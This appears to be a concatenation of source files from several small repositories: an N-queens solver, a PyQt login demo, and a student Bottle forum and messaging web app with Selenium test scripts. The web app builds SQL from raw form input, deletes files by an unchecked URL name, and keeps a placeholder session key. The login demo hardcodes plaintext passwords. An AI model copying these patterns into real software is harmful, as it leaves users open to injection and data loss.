return [(u-1, self.x) for u in range(self.y, self.min, -1)]
def down(self):
return [(d, self.x) for d in range(self.y+1, self.max)]
def vir(self):
return self.up() + self.down()
def up_right(self):
return [(self.y-ur, self.x+ur) for ur in range(1, self.max) if self.x+ur < self.max and self.y-ur >= self.min]
def dwon_right(self):
return [(self.y+dr, self.x+dr) for dr in range(1, self.max) if self.x+dr < self.max and self.y+dr < self.max]
def up_left(self):
return [(self.y-ul, self.x-ul) for ul in range(1, self.max) if self.x-ul >= self.min and self.y-ul >= self.min]
def down_left(self):
return [(self.y+dl, self.x-dl) for dl in range(1, self.max) if self.x-dl >= self.min and self.y+dl < self.max]
def right_axis(self):
return self.up_right() + self.down_left()
def left_axis(self):
return self.up_left() + self.dwon_right()
def all_possible_move(self):
return [(self.y, self.x)] + self.hor() + self.vir() + self.right_axis() + self.left_axis()
| {"/main.py": ["/queen.py"]} |
78,224 | Me-TheKing/8Queen | refs/heads/main | /main.py | from queen import Queen
board_set =[]
ROW = COL = BOARD_SIZE = 4
set_num = next_col_x = y_row = x_col = 0
break_loop = False
def check_cell(y, x, board_set_lst):
q = Queen(y, x, BOARD_SIZE).all_possible_move()
for a_set in q:
if a_set in board_set_lst:
return False
return True
def pop_last_set(board):
y, x = board.pop()
return y, x+1
while True:
if y_row < ROW and x_col < COL:
for y in range(y_row, ROW):
for x in range(x_col, COL):
if check_cell(y, x, board_set):
board_set.append((y, x))
y_row, x_col = y, x
break # breaak X range
elif x == col-1 and not check_cell(y, x, board_set):
y_row, x_col = pop_last_set(board_set)
break_loop = True
break # break X range
if break_loop:
break_loop = False
break # break Y range
x_col = 0 # reset the start of the loop by zero
if len(board_set) == BOARD_SIZE:
set_num += 1
print(f'ok set {set_num} = {board_set}')
# continue search by remove the last cell set, and continue with the next cell
y_row, x_col = pop_last_set(board_set)
elif board_set:
y_row, x_col = pop_last_set(board_set)
elif not board_set:
break # break the while loop
| {"/main.py": ["/queen.py"]} |
78,227 | dekapaan/PyQt-exception-handling | refs/heads/main | /main.py | from PyQt5.QtWidgets import *
from PyQt5.QtGui import *
from PyQt5 import QtCore
import sys
import qtawesome as qta
class UI(QWidget):
def __init__(self):
super().__init__()
self.setFixedWidth(600)
self.setFixedHeight(300)
self.setWindowFlags(QtCore.Qt.FramelessWindowHint)
self.setStyleSheet(
"""
* {background: #222;}
QLineEdit {
background: white;
color: #222;
border-radius: 2px;
width: 300px;
height: 30px;
}
"""
)
self.icon_exit = qta.icon('mdi.close', color='white', scale_factor=2)
self.btn_exit = QPushButton(self.icon_exit, '', self)
self.btn_exit.setCursor(QtCore.Qt.PointingHandCursor)
self.btn_exit.clicked.connect(exit)
self.btn_exit.setStyleSheet("background: #222;" + "border: none;" + "color: white;")
self.btn_exit.move(560, 20)
self.title = QLabel('Authentication', self)
self.title.setStyleSheet("background: #222;" + "color: white;")
self.title.move(25, 20)
self.entry_username = QLineEdit(self)
self.entry_username.setPlaceholderText("Enter username")
self.entry_username.setStyleSheet(
"""
background: white;
color: #222;
""")
self.entry_username.move(160, 97)
self.entry_password = QLineEdit(self)
self.entry_password.setPlaceholderText("Enter password")
self.entry_password.move(160, 150)
self.btn_login = QPushButton('Login', self)
self.btn_login.clicked.connect(self.login)
self.btn_login.setStyleSheet(
"""
* {
background: #222;
color: #ff007f;
border: 1px solid #ff007f;
padding: 10px 50px;
border-radius: 2px;
}
:hover {
background: #ff007f;
color: #222;
}
""")
self.btn_login.move(244, 200)
self.dict_user_pass = {"Zoe": "wavywave99", "Adam": "bighead64", "dekapaan": "dayon"}
self.old_pos = self.pos()
self.show()
def mousePressEvent(self, event):
self.old_pos = event.globalPos()
def mouseMoveEvent(self, event):
moved = QtCore.QPoint(event.globalPos() - self.old_pos)
self.move(self.x() + moved.x(), self.y() + moved.y())
self.old_pos = event.globalPos()
def login(self):
try:
user = self.entry_username.text()
password = self.entry_password.text()
if user in self.dict_user_pass:
if password == self.dict_user_pass[user]:
import exception_handling
root.destroy()
else:
raise ValueError
else:
raise KeyError
except ValueError:
msg_box = QMessageBox()
msg_box.setText("Incorrect password")
msg_box.setIcon(QMessageBox.Critical)
msg_box.setWindowTitle("Error")
msg_box.exec()
except KeyError:
msg_box = QMessageBox()
msg_box.setText("Username doesn't exist")
msg_box.setIcon(QMessageBox.Critical)
msg_box.setWindowTitle("Error")
msg_box.exec()
app = QApplication(sys.argv)
root = UI()
app.exec()
| {"/main.py": ["/exception_handling.py"]} |
78,228 | dekapaan/PyQt-exception-handling | refs/heads/main | /exception_handling.py | from PyQt5.QtWidgets import *
from PyQt5.QtGui import *
from PyQt5 import QtCore
import sys
import qtawesome as qta
class ExceptionHandling(QWidget):
def __init__(self):
super().__init__()
self.setWindowFlags(QtCore.Qt.FramelessWindowHint)
self.setFixedWidth(400)
self.setFixedHeight(200)
self.setStyleSheet(
"""
* {background: #222;}
QLineEdit {
background: white;
color: #222;
border-radius: 2px;
width: 300px;
height: 30px;
}
"""
)
self.title = QLabel('Exception handling', self)
self.title.setStyleSheet("background: #222;" + "color: white;")
self.title.move(12, 11)
self.icon_exit = qta.icon('mdi.close', color='white', scale_factor=2)
self.btn_exit = QPushButton(self.icon_exit, '', self)
self.btn_exit.setCursor(QtCore.Qt.PointingHandCursor)
self.btn_exit.clicked.connect(exit)
self.btn_exit.setStyleSheet("background: #222;" + "border: none;" + "color: white;")
self.btn_exit.move(370, 12)
self.entry_amount = QLineEdit(self)
self.entry_amount.setPlaceholderText("Enter amount in your account")
self.entry_amount.move(50, 70)
self.btn_login = QPushButton('Check Qualification', self)
self.btn_login.clicked.connect(self.check)
self.btn_login.setStyleSheet(
"""
* {
background: #222;
color: #ff007f;
border: 1px solid #ff007f;
padding: 10px 30px;
border-radius: 2px;
}
:hover {
background: #ff007f;
color: #222;
}
""")
self.btn_login.move(100, 120)
self.show()
self.old_pos = self.pos()
def mousePressEvent(self, event):
self.old_pos = event.globalPos()
def mouseMoveEvent(self, event):
moved = QtCore.QPoint(event.globalPos() - self.old_pos)
self.move(self.x() + moved.x(), self.y() + moved.y())
self.old_pos = event.globalPos()
def check(self):
try:
amount = int(self.entry_amount.text())
if amount < 0:
raise ValueError
if amount < 3000:
msg_box = QMessageBox()
msg_box.setText("Insufficient Amount")
msg_box.setIcon(QMessageBox.Critical)
msg_box.setWindowTitle("Warning")
msg_box.exec()
elif amount >= 3000:
msg_box = QMessageBox()
msg_box.setText("Congratulations. You qualify to go to Malaysia")
msg_box.setIcon(QMessageBox.Information)
msg_box.setWindowTitle("Good News")
msg_box.exec()
except ValueError:
msg_box = QMessageBox()
msg_box.setText("Invalid amount")
msg_box.setIcon(QMessageBox.Warning)
msg_box.setWindowTitle("Error")
msg_box.exec()
app = QApplication(sys.argv)
root = ExceptionHandling() | {"/main.py": ["/exception_handling.py"]} |
78,229 | jeffrey-lai20/Virtual-Users | refs/heads/master | /controller.py | '''
This file will handle our typical Bottle requests and responses
You should not have anything beyond basic page loads, handling forms and
maybe some simple program logic
'''
from bottle import route, get, post, request, static_file, error, Bottle, template, redirect, delete
import os
import argparse
import model
import bottle
import sqlite3
global login
login = 0
#-----------------------------------------------------------------------------
# Static file paths
#-----------------------------------------------------------------------------
# Allow image loading
@route('/img/<picture:path>')
def serve_pictures(picture):
'''
serve_pictures
Serves images from static/img/
:: picture :: A path to the requested picture
Returns a static file object containing the requested picture
'''
return static_file(picture, root='static/img/')
#-----------------------------------------------------------------------------
# Allow CSS
@route('/css/<css:path>')
def serve_css(css):
'''
serve_css
Serves css from static/css/
:: css :: A path to the requested css
Returns a static file object containing the requested css
'''
return static_file(css, root='static/css/')
#-----------------------------------------------------------------------------
# Allow javascript
@route('/js/<js:path>')
def serve_js(js):
'''
serve_js
Serves js from static/js/
:: js :: A path to the requested javascript
Returns a static file object containing the requested javascript
'''
return static_file(js, root='static/js/')
#-----------------------------------------------------------------------------
# Pages
#-----------------------------------------------------------------------------
# Redirect to login
@get('/')
@get('/home')
def get_index():
'''
get_index
Serves the index page
'''
global login
return model.index(login)
#-----------------------------------------------------------------------------
# Display the login page
@get('/login')
def get_login_controller():
'''
get_login
Serves the login page
'''
global login
login = 1
return model.login_form()
#-----------------------------------------------------------------------------
# Attempt the login
@post('/login')
def post_login():
'''
post_login
Handles login attempts
Expects a form containing 'username' and 'password' fields
'''
# Handle the form processing
username = request.forms.get('username')
password = request.forms.get('password')
# Call the appropriate method
return model.login_check(username, password)
# -----------------------------------------------------------------------------
# Display the register page
@get('/register')
def get_register_controller():
'''
get_register
Serves the register page
'''
return model.register_form()
# -----------------------------------------------------------------------------
# Attempt the register
@post('/register')
def post_register():
'''
post_register
Handles Register attempts
Expects a form containing 'username' and 'password' fields
'''
# Handle the form processing
username = request.forms.get('username')
password = request.forms.get('password')
confirm_password = request.forms.get('confirm_password')
# Call the appropriate method
return model.register_post(username, password, confirm_password)
# -----------------------------------------------------------------------------
# Logout
@get('/logout')
def get_logout_controller():
'''
get_login
Serves the login page
'''
global login
login = 0
return model.logout()
#-----------------------------------------------------------------------------
@get('/about')
def get_about():
'''
get_about
Serves the about page
'''
return model.about()
#-----------------------------------------------------------------------------
@get('/invalid')
def get_invalid():
'''
get_invalid
Serves the invalid page
'''
reason = request.query['reason']
return model.invalid(reason)
#-----------------------------------------------------------------------------
@get('/dashboard')
def get_dashboard():
'''
get_dashboard
Serves the dashboard page
'''
return model.dashboard()
#-----------------------------------------------------------------------------
@error(404)
def error404(error):
return model.error404()
#-----------------------------------------------------------------------------
#list all Threads
@get('/forum')
def get_forum(thread_name = None):
model.aaa.require(fail_redirect='/login')
conn = sqlite3.connect('forum.db')
c = conn.cursor()
threads = []
cursor = c.execute("SELECT name, role, topic, reply, content, id, reply_id from FORUM")
for row in cursor:
threads.append(row)
threads.reverse()
conn.close()
return model.template("templates/forum.html", threads = threads, thread_name = thread_name, **model.current_user_data(), muted = model.all_user_data()['users'][model.current_user_data()['username']]['muted'])
@get('/forum/new')
def forum_new(thread_name = None):
model.aaa.require(fail_redirect='/login')
conn = sqlite3.connect('forum.db')
c = conn.cursor()
threads = []
cursor = c.execute("SELECT name, role, topic, reply, content, id, reply_id from FORUM")
for row in cursor:
threads.append(row)
threads.reverse()
conn.close()
return model.template("templates/forum_new.html", threads = threads, thread_name = thread_name, muted = model.all_user_data()['users'][model.current_user_data()['username']]['muted'])
@post('/forum/new')
def receive_forum_new(thread_name = None):
model.aaa.require(fail_redirect='/login')
thread_name = request.forms.get('topic')
content = request.forms.get('content')
conn = sqlite3.connect('forum.db')
c = conn.cursor()
# c.execute("SELECT count(*) FROM FORUM WHERE topic='"+thread_name+"'")
#
# #if the count is 1, then table exists
# if c.fetchone()[0]>=1 :
# c.execute("UPDATE FORUM set content = '"+content+"' where topic='"+thread_name+"' and reply = 'no'")
# else :
c.execute("INSERT INTO FORUM (name,role,topic,reply,content) \
VALUES ('"+model.aaa.current_user.username+"', '"+model.aaa.current_user.role+"', '"+thread_name+"', 'no', '"+content+"')")
conn.commit()
conn.close()
return get_forum()
@get('/forum/read/<thread_name>')
def get_forum_by_name(thread_name):
model.aaa.require(fail_redirect='/login')
return get_forum(thread_name)
@post('/forum/read/<thread_name>')
def get_reply(thread_name):
model.aaa.require(fail_redirect='/login')
reply = request.forms.get('reply')
conn = sqlite3.connect('forum.db')
c = conn.cursor()
c.execute("INSERT INTO FORUM (name,role,topic,reply,content,id) \
VALUES ('"+model.aaa.current_user.username+"', '"+model.aaa.current_user.role+"', '"+"reply"+"', 'yes', '"+reply+"', '"+thread_name+"')")
conn.commit()
conn.close()
return get_forum(thread_name)
@get('/forum/delete/<info>')
def get_delete(info):
model.aaa.require(fail_redirect='/login')
reply = request.forms.get('reply')
conn = sqlite3.connect('forum.db')
c = conn.cursor()
if len(info.split('_y_')) == 2:
info = info.split('_y_')
c.execute("DELETE FROM FORUM WHERE reply_id = '"+info[0]+"'")
conn.commit()
conn.close()
return get_forum(info[1])
elif len(info.split('_n_')) == 2:
# print(info)
info = info.split('_n_')
# print(info)
# c.execute("DELETE FROM FORUM WHERE topic = '"+info[0]+"' and reply = 'no'")
# c.execute("DELETE FROM FORUM WHERE topic = '"+info[0]+"' and reply = 'yes'")
c.execute("DELETE FROM FORUM WHERE id = '"+info[0]+"'")
conn.commit()
conn.close()
return get_forum(None)
@get('/profile')
def profile():
return model.profile()
@get('/manage_user')
def manage_user():
return model.manage_user()
@get('/delete/<user_name>')
def delete_user(user_name):
model.aaa.require(fail_redirect='/login')
if model.aaa.current_user.role=='user':
return model.error404()
del model.all_user_data()['users'][user_name]
return bottle.redirect('/manage_user')
@get('/promote/<user_name>')
def promote(user_name):
model.aaa.require(fail_redirect='/login')
if model.aaa.current_user.role=='user':
return model.error404()
model.all_user_data()['users'][user_name]['role'] = 'staff'
return bottle.redirect('/manage_user')
@get('/profile/reset_password')
def reset_password():
model.aaa.require(fail_redirect='/login')
return
@get('/mute/<user>')
def mute_user(user):
model.aaa.require(fail_redirect='/login')
if model.aaa.current_user.role=='user':
return model.error404()
model.all_user_data()['users'][user]['muted'] = 1
return bottle.redirect('/manage_user')
@get('/unmute/<user>')
def unmute_user(user):
model.aaa.require(fail_redirect='/login')
if model.aaa.current_user.role=='user':
return model.error404()
model.all_user_data()['users'][user]['muted'] = 0
return bottle.redirect('/manage_user')
##########################################################################################
@get('/message')
def message(db):
return model.message(db)
@post('/message')
def message_post(db):
return model.message_post(db)
@delete('/message/<message_id:int>')
def message_delete(message_id, db):
return model.message_delete(message_id, db)
@post('/message_reply')
def message_reply(db):
return model.message_reply_post(db)
@get('/reset_password')
def reset_password():
return model.reset_password()
@post('/reset_password')
def reset_password_post():
# Handle the form processing
old_password = request.forms.get('old_password')
new_password = request.forms.get('new_password')
confirm_password = request.forms.get('confirm_password')
return model.reset_password_post(old_password, new_password, confirm_password)
| {"/controller.py": ["/model.py"], "/run.py": ["/model.py", "/controller.py"]} |
78,230 | jeffrey-lai20/Virtual-Users | refs/heads/master | /run.py | '''
This is a file that configures how your server runs
You may eventually wish to have your own explicit config file
that this reads from.
For now this should be sufficient.
Keep it clean and keep it simple, you're going to have
Up to 5 people running around breaking this constantly
If it's all in one file, then things are going to be hard to fix
If in doubt, `import this`
'''
#-----------------------------------------------------------------------------
import sys
from bottle import get, post, request, static_file, error, Bottle, template,ServerAdapter, route, run, server_names
import bottle.ext.sqlite
import model
import argparse
import bottle
from beaker.middleware import SessionMiddleware
import os
from cheroot import wsgi
from cheroot.ssl.builtin import BuiltinSSLAdapter
import ssl
import crypt
import pwd
#-----------------------------------------------------------------------------
# You may eventually wish to put these in their own directories and then load
# Each file separately
# For the template, we will keep them together
import model
import view
import controller
#-----------------------------------------------------------------------------
# import configurations
configs = {}
try:
import configs
configs = configs.configs
default_configs = False
except ImportError:
default_configs = True
pass
# It might be a good idea to move the following settings to a config file and then load them
# Change this to your IP address or 0.0.0.0 when actually hosting
host = '0.0.0.0' if default_configs else configs["web"]["host"]
# Test port, change to the appropriate port to host
port = 8080 if default_configs else configs["web"]["port"]
# Turn this off for production
debug = True
# Turn this off for production
fast = False if default_configs else configs["app"]["fast"]
################################################################################################################
#Resource part
@get('/resource')
def do_index():
"""List all uploaded files"""
model.aaa.require(fail_redirect='/login')
root = '%s/' % bottle.request.environ.get('SCRIPT_NAME')
return bottle.template('templates/resource.html', files=os.listdir(request.app.config['file_upload.dir']), root=root, **model.current_user_data())
#return model.page_view('resource', page_title="Resource", files=os.listdir(request.app.config['file_upload.dir']), root=root)
@get('/resource/download/<filename>')
def do_download(filename):
model.aaa.require(fail_redirect='/login')
"""Return a static file from the files directory"""
return bottle.static_file(filename, root=request.app.config['file_upload.dir'])
@post('/resource/upload')
def do_upload():
model.aaa.require(fail_redirect='/login')
"""Upload a file if it's missing"""
upload = bottle.request.files.get('upload') # pylint: disable-msg=E1101
try:
upload.save(request.app.config['file_upload.dir'])
except IOError as io_error:
return bottle.HTTPError(409, io_error)
root = '%s/' % bottle.request.environ.get('SCRIPT_NAME')
bottle.redirect('/resource')
@get('/resource/delete/<filename>')
def do_delete(filename):
model.aaa.require(fail_redirect='/login')
if model.aaa.current_user.role == "user":
return
os.remove("files/" + filename)
bottle.redirect('/resource')
def create_files_dir(path):
"""Create a directory to upload files to if it's missing."""
if not os.path.isdir(path):
os.mkdir(path)
################################################################################################################
app = bottle.app()
class SSLCherryPyServer(ServerAdapter):
def run(self, handler):
server = wsgi.Server((self.host, self.port), handler)
server.ssl_adapter = BuiltinSSLAdapter("ca.crt", "ca.key")
server.ssl_adapter.context.options |= ssl.OP_NO_TLSv1
server.ssl_adapter.context.options |= ssl.OP_NO_TLSv1_1
try:
server.start()
finally:
server.stop()
def run_server():
'''
run_server
Runs a bottle server
'''
# app = bottle.app()
# add bottle-sqlite plugin
# link to sqlite3 database
plugin=bottle.ext.sqlite.Plugin(dbfile='./database/info2222.db')
app.install(plugin)
session_opts = {
'session.cookie_expires': True,
'session.encrypt_key': 'please use a random key and keep it secret!',
'session.httponly': True,
'session.timeout': 3600 * 24, # 1 day
'session.type': 'cookie',
'session.validate_key': True,
}
################################################################################################################
# bottle.route('/resource', 'GET', do_index)
# bottle.route('/resource/download/<filename>', 'GET', do_download)
# bottle.route('/resource/upload', 'POST', do_upload)
# Change working directory so relative paths (and template lookup) work
os.chdir(os.path.dirname(os.path.abspath(__file__)))
app.config.setdefault('file_upload.dir', 'files')
if os.path.exists('file_upload.conf'):
app.config.load_config('file_upload.conf')
create_files_dir(app.config['file_upload.dir'])
################################################################################################################
appp = SessionMiddleware(app, session_opts)
run(app=appp, host=host, port=port, server=SSLCherryPyServer, fast=fast)
#-----------------------------------------------------------------------------
# Optional SQL support
# Comment out the current manage_db function, and
# uncomment the following one to load an SQLite3 database
def manage_db():
'''
Blank function for database support, use as needed
'''
pass
"""
import sql
def manage_db():
'''
manage_db
Starts up and re-initialises an SQL databse for the server
'''
database_args = ":memory:" # Currently runs in RAM, might want to change this to a file if you use it
sql_db = sql.SQLDatabase(database_args=database_args)
return
"""
#-----------------------------------------------------------------------------
# What commands can be run with this python file
# Add your own here as you see fit
command_list = {
'manage_db' : manage_db,
'server' : run_server
}
# The default command if none other is given
default_command = 'server'
def run_commands(args):
'''
run_commands
Parses arguments as commands and runs them if they match the command list
:: args :: Command line arguments passed to this function
'''
commands = args[1:]
# Default command
if len(commands) == 0:
commands = [default_command]
for command in commands:
if command in command_list:
command_list[command]()
else:
print("Command '{command}' not found".format(command=command))
#-----------------------------------------------------------------------------
def app_instance():
plugin=bottle.ext.sqlite.Plugin(dbfile='./database/info2222.db')
app.install(plugin)
session_opts={
'session.cookie_expires': True,
'session.encrypt_key': 'please use a random key and keep it secret!',
'session.httponly': True,
'session.timeout': 3600 * 24, # 1 day
'session.type': 'cookie',
'session.validate_key': True,
}
os.chdir(os.path.dirname(os.path.abspath(__file__)))
app.config.setdefault('file_upload.dir', 'files')
if os.path.exists('file_upload.conf'):
app.config.load_config('file_upload.conf')
create_files_dir(app.config['file_upload.dir'])
appp=SessionMiddleware(app, session_opts)
return appp
#-----------------------------------------------------------------------------
if __name__ == '__main__':
run_commands(sys.argv)
else:
app = app_instance(); | {"/controller.py": ["/model.py"], "/run.py": ["/model.py", "/controller.py"]} |
78,231 | jeffrey-lai20/Virtual-Users | refs/heads/master | /virtual_users/virtual_user8.py | import requests
import time
import getpass
import selenium
import time
import sys
import csv
import getpass
from selenium import webdriver
default_target = "https://0.0.0.0:8080/invalid?reason=User%20is%20already%20existing.."
def scrape(target):
driver = webdriver.Firefox()
print("Going to home page")
driver.get("https://0.0.0.0:8080/")
time.sleep(1)
print("Going to register page")
driver.get("https://0.0.0.0:8080/register")
username = "test2"
password = "test2"
print("Registering!")
# Enter username
username_field = driver.find_element_by_name("username")
username_field.clear()
username_field.send_keys(username)
# Enter password
password_field = driver.find_element_by_name("password")
password_field.clear()
password_field.send_keys(password)
# Enter confirm password
password_field = driver.find_element_by_name("confirm_password")
password_field.clear()
password_field.send_keys(password)
time.sleep(1)
# Hit the button
register_button = driver.find_element_by_name("registerButton")
register_button.click()
print("Registered!")
time.sleep(1)
driver.get(target)
print("Arrived at target")
time.sleep(1)
print("Finished, closing web driver.")
driver.close()
if __name__ == '__main__':
if len(sys.argv) == 1:
target_url = default_target
else:
target_url = sys.argv[1]
scrape(target_url)
print("Finished!")
| {"/controller.py": ["/model.py"], "/run.py": ["/model.py", "/controller.py"]} |
78,232 | jeffrey-lai20/Virtual-Users | refs/heads/master | /random_virtual.py | import os
from random import randint
number = randint(1, 15)
num = str(number)
os.system('python3 virtual_users/virtual_user' + num + '.py')
| {"/controller.py": ["/model.py"], "/run.py": ["/model.py", "/controller.py"]} |
78,233 | jeffrey-lai20/Virtual-Users | refs/heads/master | /virtual_users/virtual_user13.py | import requests
import time
import getpass
import selenium
import time
import sys
import csv
import getpass
from selenium import webdriver
default_target = "https://0.0.0.0:8080/message"
def scrape(target):
driver = webdriver.Firefox()
print("Going to home page")
driver.get("https://0.0.0.0:8080/")
time.sleep(1)
print("Going to login page")
driver.get("https://0.0.0.0:8080/login")
username = "test2"
password = "test2"
print("Logging in")
# Enter username
username_field = driver.find_element_by_name("username")
username_field.clear()
username_field.send_keys(username)
# Enter password
password_field = driver.find_element_by_name("password")
password_field.clear()
password_field.send_keys(password)
time.sleep(1)
# Hit the button
login_button = driver.find_element_by_name("loginButton")
login_button.click()
print("Logged in!")
time.sleep(1)
message_button = driver.find_element_by_name("messageButton")
message_button.click()
time.sleep(1)
driver.find_element_by_id("new_message_btn").click();
time.sleep(1)
print("Writing message")
to_field = driver.find_element_by_name("to_user")
to_field.clear()
to_field.send_keys("test3")
subject_field = driver.find_element_by_name("subject")
subject_field.clear()
subject_field.send_keys("Virtual")
body_field = driver.find_element_by_name("body")
body_field.clear()
body_field.send_keys("User message")
reply_button = driver.find_element_by_name("sendMessage")
reply_button.click()
time.sleep(1)
driver.get("https://0.0.0.0:8080/logout")
time.sleep(1)
print("Going to login page")
driver.get("https://0.0.0.0:8080/login")
username = "test3"
password = "test3"
print("Logging in")
# Enter username
username_field = driver.find_element_by_name("username")
username_field.clear()
username_field.send_keys(username)
# Enter password
password_field = driver.find_element_by_name("password")
password_field.clear()
password_field.send_keys(password)
time.sleep(1)
# Hit the button
login_button = driver.find_element_by_name("loginButton")
login_button.click()
print("Logged in!")
time.sleep(1)
message_button = driver.find_element_by_name("messageButton")
message_button.click()
time.sleep(1)
link1 = driver.find_element_by_link_text("Virtual")
link1.click()
time.sleep(1)
replay_field = driver.find_element_by_name("replay")
replay_field.clear()
replay_field.send_keys("This is a reply")
time.sleep(1)
link2 = driver.find_element_by_name("submitButton")
link2.click()
time.sleep(4)
link3 = driver.find_element_by_link_text("Virtual")
link3.click()
time.sleep(1)
link4 = driver.find_element_by_link_text("Delete")
link4.click()
time.sleep(1)
driver.get(target)
print("Arrived at target")
time.sleep(1)
print("Finished, closing web driver.")
driver.close()
if __name__ == '__main__':
if len(sys.argv) == 1:
target_url = default_target
else:
target_url = sys.argv[1]
scrape(target_url)
print("Finished!")
| {"/controller.py": ["/model.py"], "/run.py": ["/model.py", "/controller.py"]} |
78,234 | jeffrey-lai20/Virtual-Users | refs/heads/master | /database/create_db.py | import sqlite3
def create_connection(db_file):
""" create a database connection to the SQLite database
specified by db_file
:param db_file: database file
:return: Connection object or None
"""
conn = None
try:
conn = sqlite3.connect(db_file)
print("Opened database successfully")
return conn
except sqlite3.Error as e:
print(e)
return conn
def create_table(conn, create_table_sql):
""" create a table from the create_table_sql statement
:param conn: Connection object
:param create_table_sql: a CREATE TABLE statement
:return:
"""
try:
c = conn.cursor()
c.execute(create_table_sql)
except sqlite3.Error as e:
print(e)
def main():
database = r"info2222.db"
sql_create_messages_table=""" CREATE TABLE IF NOT EXISTS messages (
id integer PRIMARY KEY,
from_user text NOT NULL,
to_user text NOT NULL,
subject text NOT NULL,
body text,
create_at text NOT NULL
); """
sql_create_replies_table="""CREATE TABLE IF NOT EXISTS replies (
id integer PRIMARY KEY,
from_user text NOT NULL,
message_id integer NOT NULL,
body text,
create_at text NOT NULL,
FOREIGN KEY (message_id) REFERENCES messages (id)
);"""
# create a database connection
conn = create_connection(database)
# create tables
if conn is not None:
# create projects table
create_table(conn, sql_create_messages_table)
# create tasks table
create_table(conn, sql_create_replies_table)
else:
print("Error! cannot create the database connection.")
if __name__ == '__main__':
main()
| {"/controller.py": ["/model.py"], "/run.py": ["/model.py", "/controller.py"]} |
78,235 | jeffrey-lai20/Virtual-Users | refs/heads/master | /forum_test.py | import sqlite3
conn = sqlite3.connect('forum.db')
c = conn.cursor()
c.execute('''CREATE TABLE FORUM
(name TEXT NOT NULL,
role TEXT NOT NULL,
topic TEXT NOT NULL,
reply TEXT NOT NULL,
content CHAR(300) NOT NULL,
id CHAR(36) default (lower(hex(randomblob(4))) || '-' || lower(hex(randomblob(2))) || '-4' || substr(lower(hex(randomblob(2))),2) || '-' || substr('89ab',abs(random()) % 4 + 1, 1) || substr(lower(hex(randomblob(2))),2) || '-' || lower(hex(randomblob(6)))),
reply_id CHAR(36) default (lower(hex(randomblob(4))) || '-' || lower(hex(randomblob(2))) || '-4' || substr(lower(hex(randomblob(2))),2) || '-' || substr('89ab',abs(random()) % 4 + 1, 1) || substr(lower(hex(randomblob(2))),2) || '-' || lower(hex(randomblob(6)))));''')
conn.commit()
c.execute("INSERT INTO FORUM (name,role,topic,reply,content) \
VALUES ('admin', 'admin', 'hello dear', 'no', 'this is test')")
conn.commit()
c.execute("INSERT INTO FORUM (name,role,topic,reply,content) \
VALUES ('admin', 'admin', 'hello dear', 'yes', 'this is a test reply')")
conn.commit()
c.execute("INSERT INTO FORUM (name,role,topic,reply,content) \
VALUES ('bob', 'user', 'hello dear', 'yes', 'this is another test reply')")
conn.commit()
c.execute("INSERT INTO FORUM (name,role,topic,reply,content) \
VALUES ('bob', 'user', 'hello another', 'no', 'this is another another test')")
conn.commit()
c.execute("update FORUM set content=REPLACE(content,X'0D',X'0A')")
conn.commit()
cursor = c.execute("SELECT name, role, topic, content,id ,reply_id from FORUM")
for row in cursor:
print(row)
| {"/controller.py": ["/model.py"], "/run.py": ["/model.py", "/controller.py"]} |
78,236 | jeffrey-lai20/Virtual-Users | refs/heads/master | /model.py | '''
Our Model class
This should control the actual "logic" of your website
And nicely abstracts away the program logic from your page loading
It should exist as a separate layer to any database or data structure that you might be using
Nothing here should be stateful, if it's stateful let the database handle it
'''
import view
import random
from bottle import template, redirect, static_file, request
import bottle
from beaker.middleware import SessionMiddleware
from cork import Cork
from datetime import datetime, timedelta
import logging
import json
from html import escape, unescape
global name
name = ""
# Use users.json and roles.json in the local example_conf directory
aaa = Cork('example_conf', email_sender='federico.ceratto@gmail.com', smtp_url='smtp://smtp.magnet.ie')
LOG_FILENAME = 'example.log'
logging.basicConfig(filename=LOG_FILENAME,level=logging.DEBUG)
# Initialise our views, all arguments are defaults for the template
page_view = view.View()
#-----------------------------------------------------------------------------
# Current User Data
#-----------------------------------------------------------------------------
def current_user_data():
"""Show current user role"""
session = bottle.request.environ.get('beaker.session')
aaa.require(fail_redirect='/login')
return { 'user_email': aaa.current_user.email_addr, 'user_role': aaa.current_user.role, 'username':aaa.current_user.username};
def all_user_data():
session = bottle.request.environ.get('beaker.session')
aaa.require(fail_redirect='/login')
return { 'users': aaa._store.users};
def user_is_anonymous():
if aaa.user_is_anonymous:
return 'True'
return 'False'
#-----------------------------------------------------------------------------
# Index
#-----------------------------------------------------------------------------
def index(login):
'''
index
Returns the view for the index
'''
if login == 0:
return page_view("home", page_title="")
return redirect("/login")
#-----------------------------------------------------------------------------
# Login
#-----------------------------------------------------------------------------
def login_form():
'''
login_form
Returns the view for the login_form
'''
if aaa.user_is_anonymous:
return page_view("login", page_title="")
else:
return redirect("/dashboard")
#-----------------------------------------------------------------------------
# Check the login credentials
def login_check(username, password):
'''
login_check
Checks usernames and passwords
:: username :: The username
:: password :: The password
Returns either a view for valid credentials, or a view for invalid credentials
'''
# check login status and user permission
global name
name = username
aaa.login(username, password, success_redirect='/dashboard', fail_redirect='/invalid?reason=Sorry,%20These%20credentials%20do%20not%20match%20our%20records.%20Please%20Check!')
#-----------------------------------------------------------------------------
# Register
#-----------------------------------------------------------------------------
def register_form():
'''
register_form
Returns the view for the register_form
'''
if aaa.user_is_anonymous:
return page_view("register", page_title="")
else:
return redirect("/dashboard")
#-----------------------------------------------------------------------------
# Process a register request
def register_post(username, password, confirm_password):
reason = ""
if username == "" or password == "": # Wrong Username
reason = "Username and password could not be empty!"
if username in aaa._store.users:
reason = "User is already existing."
if password != confirm_password:
reason = "Password are not matching."
if reason != "":
return redirect("/invalid?reason=" + reason)
try:
aaa._store.users[username] = {
"role": "user",
"username": username,
"hash": aaa._hash(username=username, pwd=password),
"email_addr": "",
"desc": "",
"creation_date": str(datetime.utcnow()),
"last_login": str(datetime.utcnow()),
"muted" : 0,
}
aaa._store.save_users()
except Exception as e:
reason = 'Caught this server error: ' + repr(e)
else:
return redirect("/login?redirect_msg=Registered%20successfully!%20Please%20Login.")
#-----------------------------------------------------------------------------
# Invalid
#-----------------------------------------------------------------------------
def invalid(reason):
'''
Invalid
Returns the view for the invalid page
'''
return page_view("invalid", reason=reason, page_title="")
#-----------------------------------------------------------------------------
# Dashboard
#-----------------------------------------------------------------------------
def dashboard():
'''
Dashboard
Returns the view for the dashboard page
'''
aaa.require(fail_redirect='/login')
return page_view("dashboard", page_title="Dashboard", **current_user_data())
#-----------------------------------------------------------------------------
# About
#-----------------------------------------------------------------------------
def about():
'''
about
Returns the view for the about page
'''
return page_view("about", garble=about_garble(), page_title="About")
#-----------------------------------------------------------------------------
# 404
#-----------------------------------------------------------------------------
def error404():
'''
404
